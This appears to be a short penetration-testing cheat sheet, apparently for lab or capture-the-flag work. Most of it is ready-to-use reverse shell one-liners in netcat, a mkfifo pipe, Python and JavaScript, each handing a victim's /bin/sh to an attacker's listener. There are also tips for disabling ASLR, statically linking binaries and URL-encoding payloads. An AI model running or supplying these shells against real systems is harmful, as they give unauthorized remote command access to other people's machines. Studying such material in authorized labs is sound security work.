A collection of things to make life easier…
Reverse Shell
# Listener
nc -nlvp 4444
# Victim (simple netcat)
nc <listener IP> 4444 -e /bin/sh
# Victim (netcat with no -e support)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 4545 >/tmp/f
# Victim (Python)
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
# Victim (JavaScript)
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "10.10.14.13", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();
Statically link a binary
You’ll need Statifier (http://statifier.sourceforge.net/) and some dependancies. On Kali:
sudo apt-get install gcc-multilib
# In statifier directory:
make
make install
To use:
printf 0 | sudo tee /proc/sys/kernel/randomize_va_space
statifier <input exe> <output exe>
URL encode everything
echo thisisareallylongstring. | xxd -p|tr -d \\n|sed 's/../%&/g'
%74%68%69%73%69%73%61%72%65%61%6c%6c%79%6c%6f%6e%67%73%74%72%69%6e%67%2e%0a
Python HTTP Servers
python3 -m http.server
python -m SimpleHTTPServer
Execute a command using input from elsewhere
while read line; do <command> $line; done < <file>
curl -s http://example.com/ | <cut/sort/etc> | while read -r line; do <command> $line ; done